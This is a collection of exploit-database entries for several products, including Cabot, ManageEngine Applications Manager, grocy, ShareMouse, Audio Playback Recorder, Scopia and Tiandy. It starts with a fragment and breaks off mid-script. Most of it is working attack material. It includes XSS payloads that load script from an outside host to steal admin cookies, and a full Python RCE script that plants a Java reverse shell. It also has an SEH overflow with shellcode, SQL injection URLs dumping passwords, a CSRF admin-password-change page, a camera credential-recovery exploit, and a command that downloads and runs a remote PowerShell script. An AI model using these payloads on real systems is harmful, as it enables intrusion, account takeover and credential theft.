reboot with the elevated privileges.

# Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting # Date: 2020-09-06 # Exploit Author: Abhiram V # Vendor Homepage: https://cabotapp.com/ # Software Link: https://github.com/arachnys/cabot # Version: 0.11.12 # Tested on: Ubuntu Linux ############################################################################ Introduction Cabot is a free, open-source, self-hosted infrastructure monitoring platform that provides some of the best features of PagerDuty, Server Density, Pingdom and Nagios without their cost and complexity.It provides a web interface that allows us to monitor services and send telephone, sms or hipchat/email alerts to your on-duty team if those services start misbehaving or go down . ############################################################################ XSS details: Blind XSS ############################################################################ Executing Blind XSS in New Instances leads to admin account takeover URL http://127.0.0.1:5000/instance/create/ PAYLOAD "><script src=https://anonart.xss.ht></script> *payload from xsshunter.com platform for finding blind xss* PARAMETER Address column EXPLOITATION Create a user account under django administrator account and login as user to perform the attack Create a new instance and save the instances, Navigate to Services. Create a new Service from then input a Name and Url (for POC i used BlindXSS in both columns). Then append the admin account in Users to notify column and use status check and instances then save. Now the admin account gets a notification when the admin runs the check Blind XSS executes in background. when login to xsshunter.com we can see the screenshots cookies and all details of admin account IMPACT Stored XSS can be executed from any accounts and triggered in any accounts including django administration unknowingly by the victim (here it is admin) and compromise the accounts. Tested in both xsshunter.com and blindf.com Attacker can also use stored xss payloads here. ############################################################################

#!/usr/bin/python3 # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) # Google Dork: None # Date: 2020-09-04 # Exploit Author: Hodorsec # Vendor Homepage: https://manageengine.co.uk # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html # Software Link: http://archives.manageengine.com/applications_manager/14720/ # Version: Until version 14720 # Tested on: version 12900 and version 14700 # CVE : CVE-2020-14008 # Summary: # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method # Vulnerable code: # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java # 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception { # 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader(); # 131 /* */ try { # 132 /* 132 */ boolean setcredentials = false; # 133 /* 133 */ String url = "t3://" + hostname + ":" + portString; # 134 /* 134 */ JarLoader jarLoader = null; # 135 /* */ # ....<SNIP>.... # 143 /* */ } # 144 /* 144 */ else if (version == 8) # 145 /* */ { # 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists()) # 147 /* */ { # 148 /* */ # 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar"); # 150 /* */ # ....<SNIP>.... # 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader); # 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment"); # 172 /* 172 */ Object env = cls.newInstance(); # Example call for MAM version 12900: # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar # [*] Visiting page to retrieve initial cookies... # [*] Retrieving admin cookie... # [*] Getting base directory of ManageEngine... # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12 # [*] Creating JAR file... # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # added manifest # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%) # [*] Uploading JAR file... # [*] Attempting to upload JAR directly to targeted Weblogic folder... # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function! # [*] Running the Weblogic credentialtest which triggers the code in the JAR... # [*] Check your shell... # Function flow: # 1. Get initial cookie # 2. Get valid session cookie by logging in # 3. Get base directory of installation # 4. Generate a malicious JAR file # 5. Attempt to directly upload JAR, if success, jump to 7 # 6. Create task with random ID to copy JAR file to expected Weblogic location # 7. Execute task # 8. Delete task for cleanup # 9. Run the vulnerable credentialTest, using the malicious JAR import requests import urllib3 import shutil import subprocess import os import sys import random import re from lxml import html # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def get_initial_cookie(url,headers): print("[*] Visiting page to retrieve initial cookies...") target = url + "/index.do" r = requests.get(target,headers=headers,timeout=timeout,verify=False) return r.cookies def get_valid_cookie(url,headers,initial_cookies,usern,passw): print("[*] Retrieving admin cookie...") appl_cookie = "JSESSIONID_APM_9090" post_data = {'clienttype':'html', 'webstart':'', 'j_username':usern, 'ScreenWidth':'1280', 'ScreenHeight':'709', 'username':usern, 'j_password':passw, 'submit':'Login'} target = url + "/j_security_check" r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False) res = r.text if "Server responded in " in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) def get_base_dir(url,headers,valid_cookie): print("[*] Getting base directory of ManageEngine...") target = url + "/common/serverinfo.do" params = {'service':'AppManager', 'reqForAdminLayout':'true'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) tree = html.fromstring(r.content) pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title') base_dir = pathname[0] print("[*] Found base directory: " + base_dir) return base_dir def create_jar(command,jarname,revhost,revport): print("[*] Creating JAR file...") # Variables classname = "Environment" pkgname = "weblogic.jndi" fullname = pkgname + "." + classname manifest = "MANIFEST.MF" # Directory variables curdir = os.getcwd() metainf_dir = "META-INF" maindir = "weblogic" subdir = maindir + "/jndi" builddir = curdir + "/" + subdir # Check if directory exist, else create directory try: if os.path.isdir(builddir): pass else: os.makedirs(builddir) except OSError: print("[!] Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:])

# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting # Date: 2020-09-06 # Exploit Author: Mufaddal Masalawala # Vendor Homepage: https://berrnd.de/ # Software Link: https://github.com/grocy/grocy # Version: 2.7.1 # Tested on: Kali Linux 2020.3 # Proof Of Concept: grocy household management solution v2.7.1, allows stored XSS and HTML Injection, via Create Shopping List module, that is rendered upon deletiing that Shopping List. To exploit this vulnerability: 1. Login to the application 2. Go to 'Shooping List' module 3. Click on 'New Shopping List' module 4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name' input field. 5. Click Save 6. Click 'Delete Shopping List' *#REQUEST -->* POST /api/objects/shopping_lists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/shoppinglist/new Content-type: application/json Content-Length: 38 Connection: close Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd {"name":"<marquee onstart=alert(1)> "} *#RESPONSE -->* HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 06 Sep 2020 12:53:13 GMT Content-Type: application/json Connection: close X-Powered-By: PHP/7.3.21 Content-Length: 26 {"created_object_id":"21"} Regards, Mufaddal M

# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path # Discovery Date: 2020-09-08 # Discovery by: Alan Lacerda (alacerda) # Vendor Homepage: https://www.sharemouse.com/ # Software Link: https://www.sharemouse.com/ShareMouseSetup.exe # Version: 5.0.43 # Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); PS > Invoke-AllChecks ServiceName : ShareMouse Service Path : C:\Program Files (x86)\ShareMouse\smService.exe StartName : LocalSystem AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath> PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName AcceptStop DisplayName PathName StartName TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path # Discovery Date: 2020-09-08 # Response from Input Director Support: 09/09/2020 # Exploit Author: TOUHAMI Kasbaoui # Vendor Homepage: https://www.inputdirector.com/ # Version: 1.4.3 # Tested on: Windows Server 2012, Windows 10 # Find the Unquoted Service Path Vulnerability: C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ Input Director Service InputDirector C:\Program Files (x86)\InputDirector\IDWinService.exe Auto # Service info: C:\sc qc IDWinService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: InputDirector TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Input Director\IDWinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Input Director Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: A successful attempt to exploit this vulnerability could allow executing code during startup or reboot with the elevated privileges.

# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH) # Date: 2020-09-08 # Author: Felipe Winsnes # Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe # Version: 3.2.2 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif # Proof of Concept: # 1.- Run the python script, it will create the file "poc.txt" & "buf.txt". # 2.- Copy the content of the new file "buf.txt" to clipboard. # 3.- Open the application. # 4.- Click on the bottom-right blue button to eject. # 5.- Delete everything on the parameter and paste the clipboard (buf.txt). # 6.- Click eject once again to close it. # 7.- Copy poc.txt to the clipboard. # 8.- Click on "Register". # 9.- Paste clipboard (poc.txt) on the parameter "Name". # 10.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 447 bytes buf = b"w00tw00t" buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37" buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52" buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65" buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b" buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42" buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51" buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36" buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67" buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34" buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51" buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e" buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79" buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c" buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51" buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53" buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d" buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57" buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b" buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45" buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54" buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63" buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b" buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c" buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30" buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79" buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58" buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37" buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50" buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70" buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73" buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71" buf += b"\x75\x67\x70\x41\x41" egg = "" egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10023B71) buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() f = open ("buf.txt", "w") f.write(buf) f.close()

# Exploit Title: Tailor Management System - 'id' SQL Injection # Google Dork: N/A # Date: 2020-09-08 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Version: v1.0 # Tested on: Kali linux # CVE: N/A http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- - http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- - http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -

# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password) # Google Dork: inurl:scopia+index.jsp # Date: 2020-09-09 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://avaya.com # Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605 # Version: 8.3.915.4 # Tested on: Windows 10 Pro # CVE : N/A # PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 # CSRF to change admin password # The admin password will be changed to "attacker" <!DOCTYPE html> <html> <body> <form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp"> <input type="text" name="JSESSIONID" value=""> <input type="text" name="newadminusername" value=""> <input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C"> <input type="text" name="newenablext1000meetingpin" value="false"> <input type="text" name="newxt1000meetingpin" value="EB8169F43227957C"> <input type="text" name="checkstatus" value="true"> <input type="submit" value="Send"> </form> </body> </html>

# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure # Date: 2020-09-10 # Exploit Author: zb3 # Vendor Homepage: http://en.tiandy.com # Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html # Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html # Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0 # Tested on: Linux # CVE: N/A # Requires Python 3 and PyCrypto # For more details and information on how to escalate this further, see: # https://github.com/zb3/tiandy-research import sys import hashlib import base64 import socket import struct from Crypto.Cipher import DES def main(): if len(sys.argv) != 2: print('python3 %s [host]' % sys.argv[0], file=sys.stderr) exit(1) host = sys.argv[1] conn = Channel(host) conn.connect() crypt_key = conn.get_crypt_key(65536) attempts = 2 tried_to_set_mail = False ok = False while attempts > 0: attempts -= 1 code = get_psw_code(conn) if code == False: # psw not supported break elif code == None: if not tried_to_set_mail: print("No PSW data found, we'll try to set it...", file=sys.stderr) tried_to_set_mail = True if try_set_mail(conn, '[email protected]'): code = get_psw_code(conn) if code == None: print("couldn't set mail", file=sys.stderr) break rcode, password = recover_with_code(conn, code, crypt_key) if rcode == 5: print('The device is locked, try again later.', file=sys.stderr) break if rcode == 0: print('Admin', password) ok = True break if tried_to_set_mail: try_set_mail(conn, '') if not code: print("PSW is not supported, trying default credentials...", file=sys.stderr) credentials = recover_with_default(conn, crypt_key) if credentials: user, pw = credentials print(user, pw) ok = True if not ok: print('Recovery failed', file=sys.stderr) exit(1) def try_set_mail(conn, target): conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT']) resp = conn.recv_msg() return resp[4:7] == ['RESERVEPHONE', '2', '1'] def get_psw_code(conn): conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1']) resp = conn.recv_msg() if resp[4] != 'FINDPSW': return False psw_reg = psw_data = None if len(resp) > 7: psw_reg = resp[6] psw_data = resp[7] if not psw_data: return None psw_type = int(resp[5]) if psw_type not in (1, 2, 3): raise Exception('unsupported psw type: '+str(psw_type)) if psw_type == 3: psw_data = psw_data.split('"')[3] if psw_type == 1: psw_data = psw_data.split(':')[1] psw_key = psw_reg[:0x1f] elif psw_type in (2, 3): psw_key = psw_reg[:4].lower() psw_code = td_decrypt(psw_data.encode(), psw_key.encode()) code = hashlib.md5(psw_code).hexdigest()[24:] return code def recover_with_code(conn, code, crypt_key): conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT']) resp = conn.recv_msg() rcode = int(resp[6]) if rcode == 0: return rcode, decode(resp[8].encode(), crypt_key).decode() return rcode, None def recover_with_default(conn, crypt_key): res = conn.login_with_key(b'Default', b'Default', crypt_key) if not res: return False while True: msg = conn.recv_msg() if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']: return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode() ### ### lib/des.py ### def reverse_bits(data): return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data]) def pad(data): if len(data) % 8: padlen = 8 - (len(data) % 8) data = data + b'\x00' * (padlen-1) + bytes([padlen]) return data def unpad(data): padlen = data[-1] if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1): data = data[:-padlen] return data def encrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return reverse_bits(cipher.encrypt(reverse_bits(pad(data)))) def decrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return unpad(reverse_bits(cipher.decrypt(reverse_bits(data)))) def encode(data, key): return base64.b64encode(encrypt(data, key)) def decode(data, key): return decrypt(base64.b64decode(data), key) ### ### lib/binproto.py ### def recvall(s, l): buf = b'' while len(buf) < l: nbuf = s.recv(l - len(buf)) if not nbuf: break buf += nbuf return buf class Channel: def __init__(self, ip, port=3001): self.ip = ip self.ip_bytes = socket.inet_aton(ip)[::-1] self.port = port self.msg_seq = 0 self.data_seq = 0 self.msg_queue = [] def fileno(self): return self.socket.fileno() def connect(self): self.socket = socket.socket() self.socket.connect((self.ip, self.port)) def reconnect(self): self.socket.close() self.connect() def send_cmd(self, data): self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data) self.msg_seq += 1 def send_data(self, stream_type, data): self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data) self.data_seq += 1 def recv(self): hdr = recvall(self.socket, 20) if hdr[:4] == b'\xf1\xf5\xea\xf9': lsize, stream_type = struct.unpack('<14xHI', hdr) data = recvall(self.socket, lsize - 20) if data[:4] != b'NVS\x00': print(data[:4], b'NVS\x00') raise Exception('invalid data header') return None, [stream_type, data[8:]] elif hdr[:4] == b'\xf1\xf5\xea\xf5': lsize, dsize = struct.unpack('<6xH10xH', hdr) if lsize != dsize + 20: raise Exception('size mismatch') msgs = [] for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'): msg = msg.split('\t') if '.' not in msg[0]: msg = [self.ip] + msg msgs.append(msg) return msgs, None else: raise Exception('invalid packet magic: ' + hdr[:4].hex()) def recv_msg(self): if len(self.msg_queue): ret = self.msg_queue[0] self.msg_queue = self.msg_queue[1:] return ret msgs, _ = self.recv() if len(msgs) > 1: self.msg_queue.extend(msgs[1:]) return msgs[0] def send_msg(self, msg): self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode()) def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'): self.send_msg(['IP', 